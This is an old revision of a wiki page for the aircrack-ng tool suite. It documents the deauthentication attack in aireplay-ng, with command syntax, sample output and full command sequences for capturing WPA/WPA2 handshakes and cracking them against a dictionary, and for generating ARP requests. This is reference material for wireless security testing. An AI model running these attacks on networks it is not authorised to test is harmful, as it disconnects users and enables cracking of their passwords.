User Tools

Site Tools


deauthentication

This is an old revision of the document!


Deauthentication

Description

This attack sends disassocate packets to one or more clients which are currently associated with a particular access point. Disassociating clients can be done for a number of reasons:

  • Recovering a hidden ESSID. This is an ESSID which is not being broadcast. Another term for this is “cloaked”.
  • Capturing WPA/WPA2 handshakes by forcing clients to reauthenticate
  • Generate ARP requests (Windows clients sometimes flush their ARP cache when disconnected)

Of course, this attack is totally useless if there are no associated wireless clients.

Usage

 aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0

Where:

  • -0 means deauthentication
  • 1 is the number of deauths to send (you can send muliple if you wish); 0 means send them continuously
  • -a 00:14:6C:7E:40:80 is the MAC address of the access point
  • -c 00:0F:B5:34:30:30 is the MAC address of the client to deauthenticate; if this is omitted then all clients are deauthenticated
  • ath0 is the interface name

Usage Examples

Typical Deauthentication

First, you determine a client which is currently connected. You need the MAC address for the following command:

aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0

Where:

  • -0 means deauthentication
  • 1 is the number of deauths to send (you can send muliple if you wish)
  • -a 00:14:6C:7E:40:80 is the MAC address of the access point
  • -c 00:0F:B5:34:30:30 is the MAC address of the client you are deauthing
  • ath0 is the interface name

Here is what the ouput looks like:

 11:09:28  Sending DeAuth to station   -- STMAC: [00:0F:B5:34:30:30]

WPA/WPA2 Handshake capture with an Atheros

airmon-ng start ath0
airodump-ng -c 6 --bssid 00:14:6C:7E:40:80 -w out ath0  (switch to another console)
aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0
(wait for a few seconds)
aircrack-ng -w /path/to/dictionary out.cap

Here the explaination of the above commands:

airodump-ng -c 6 –bssid 00:14:6C:7E:40:80 -w out ath0
Where:

  • -c 6 is the channel to listen on
  • –bssid 00:14:6C:7E:40:80 limits the packets collected to this one access point
  • -w out is the file prefix of the file name to be written
  • ath0 is the interface name

aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0
Where:

  • -0 means deauthentication attack
  • 5 is number of groups of deauthentication packets to send out
  • -a 00:14:6C:7E:40:80 is MAC address of the access point
  • -c 00:0F:B5:AB:CB:9D is MAC address of the client to be deauthenticated
  • ath0 is the interface name

Here is what the output looks like from “aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0”

 12:55:56  Sending DeAuth to station   -- STMAC: [00:0F:B5:AB:CB:9D]
 12:55:56  Sending DeAuth to station   -- STMAC: [00:0F:B5:AB:CB:9D]
 12:55:57  Sending DeAuth to station   -- STMAC: [00:0F:B5:AB:CB:9D]
 12:55:58  Sending DeAuth to station   -- STMAC: [00:0F:B5:AB:CB:9D]
 12:55:58  Sending DeAuth to station   -- STMAC: [00:0F:B5:AB:CB:9D]

ARP request generation with a Prism2 card

airmon-ng start wlan0
airodump-ng -c 6 -w out --bssid 00:13:10:30:24:9C wlan0  (switch to another console)
aireplay-ng -0 10 -a 00:13:10:30:24:9C wlan0
aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:09:5B:EB:C5:2B wlan0

After sending the ten batches of deauthentication packets, we start listening for ARP requests with attack 3. The -h option is mandatory and has to be the MAC address of an associated client.

If the driver is wlan-ng/, you should run the airmon-ng script (unless you know what to type) otherwise the card won't be correctly setup for injection.

Usage Tips

It is usually more effective to target a specific station using the -c parameter.

The deauthentication packets are sent directly from your PC to the clients. So you must be physically close enough to the clients for your wireless card transmissions to reach them.

Usage Troubleshooting

None at this time.

deauthentication.1172085689.txt.gz · Last modified: 2007/02/21 20:21 (external edit)